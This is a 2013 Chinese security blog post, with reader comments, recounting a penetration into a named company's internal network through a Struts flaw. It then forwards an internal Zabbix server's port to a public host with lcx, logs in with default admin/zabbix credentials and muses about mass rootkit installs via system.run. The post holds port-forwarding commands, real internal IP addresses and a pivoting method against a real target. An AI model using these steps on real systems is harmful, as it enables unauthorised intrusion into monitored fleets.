当渗透遇到zabbix--小谈zabbix安全

hongygxiang 2013-01-16 11:19:00

0x00 背景


zabbix近几年得到了各大互联网公司的认可,其强大的功能得到了各位运维攻城狮的亲耐。 公司本身也用zabbix做监控,对其属性也有所了解。不得不说zabbix除了监控强大之外,还有一个很好的用处就是在你忘记root密码的时候,重置服务器root密码,朋友们也一致认为zabbix是一个无比强大的超级后门。 打开了一扇门,另外一扇门就会随之开启,大伙都知道zabbix有system.run模块,这是可以执行任意命令的。不过还得看agent是以什么权限启的,根据我自己的观察,大伙为了方便这个模块都会启用,而且一般情况下都会用root跑。不用root跑会有很多麻烦事情。在这样的情况下,某些时候不得不说也方便了方便黑客更好的到访,这里很多朋友都报着这样的想法,zabbix在内网,外网访问不了,即使有注入或弱口令或默认口令黑客也无法访问,下面用实例来告诉你这样的想法是错的,不管你信不信,反正我是信了。

0x01 细节


出场的是tom在线 漏洞源头

http://fm.tom.com/login-share/tomlogin/login.actionstruts漏洞,struts漏洞在现在看来实在太无技术含量,对于漏洞源头,就不需解释太多 在查询端口的时候,agent的10050端口会与server的通讯。(在有proxy的情况下zabbix_server不太确认) 确认zabbix_server为:172.24.162.38 一般在安装的时候会留下zabbix_agent的安装脚本,详细信息可以到脚本里面看到 ifconfig ip信息如下(这个是作为入侵到更多服务器的跳板)

eth2 Link encap:Ethernet HWaddr 00:18:8B:83:1B:45 
inet addr:172.24.205.15 Bcast:172.24.205.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:81041 errors:0 dropped:0 overruns:0 frame:0
TX packets:60 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000 
Interrupt:16 Memory:f8000000-f8012800 

只有内网,首先要确认思路,在没有外网IP的情况下,用IPtables做一个nat完全不能达到我们想要的需求,因为zabbix我们需要用IEl来访问,只能先做内网的nat,然后把端口转到公网的某个服务器上去 先确认些信息

curl http://172.24.162.38/zabbix/ #返回的是zabbix登陆页

确认好上面的一些信息后,接下来做一个nat

0.0.0.0 98 172.24.162.38 80

看下效果 这里会监听98端口,意思是当有访问本地98端口的时候自动转向172.24.162.38的80端口,接下来只需要将本地的98端口转发至公网的某个服务器就可以正常访问了

端口转发我用lcx(linux版),这破玩意会经常断,不太好用。

./lcx -m 3 -h1 youip -p1 786 -h2 127.0.0.1 -p2 98

转发好之后就可以正常访问了

    http://youip:port/zabbix/(这里一定要记得加后面的/zabbix/,它本身就带了这个目录)

这个界面是我们想要的结果

    login:admin/zabbix (内网的zabbix大伙往往不喜欢改密码,都认为在内网很安全)

图截不完,下面其实还有很多。

接下来,可以有邪恶的想法了。添加一个监控项,给所有机器安装一个rootkit?还是全部机器添加一个用户?不要太邪恶了,只讨论思路,这样的边界问题很容易被忽略,但是带来的后果往往也是最大的。

评论

L

lion(lp) 2013-01-17 18:02:47

真牛逼。

裙下的秘密 2013-01-18 09:30:05

赞一个

S

se55i0n 2013-01-21 12:44:16

楼主思路很淫荡~

瓜瓜 2013-01-28 22:47:48

受教了。。。

子墨 2013-05-31 15:44:07

辛苦楼主分享了,赶紧做笔记

L

Lenwood 2013-06-01 10:32:24

zabbix agent权限的确很大,得考虑危险性了。

X

xiaogui 2013-09-25 17:28:34

YD

L

luwikes 2013-10-22 15:16:12

mark

枯荣 2015-08-05 17:49:41

iptables的前身叫ipfirewall (内核1.x时代),这是一个作者从freeBSD上移植过来的,能够工作在内核当中的,对数据包进行检测的一款简易访问控制工具。 lxc:内网端口转发程序

X

xiaos 2015-12-21 08:23:58

zxxbia能给其他机器执行反弹命令?

穿

穿墙人 2016-03-14 15:32:43

Mr.Robot Mr.Robot Mr.Robot Mr.Robot Mr.Robot Mr.Robot Mr.Robot Mr.Robot Mr.Robot Mr.Robot Mr.Robot Mr.Robot Mr.Robot O(∩_∩)O哈哈~

随机分类

渗透测试 文章:154 篇
前端安全 文章:29 篇
事件分析 文章:223 篇
XSS 文章:34 篇
数据分析与机器学习 文章:12 篇

扫码关注公众号

WeChat Offical Account QRCode

最新评论

D

Da22le

因为JdbcRowSetImpl是通过JNDI来实现rce的,191以后对JND

xiaokonglong

师傅我有个问题。1.2.24哪里有个问题,为什么什么是161-191?

C

CDxiaodong

0rz

U

Uesaka

说加入AD变简单的可能没遇到死亡题,2333~

Mas0n

附件: https://pan.baidu.com/s/1rbW_SQiRpv1

目录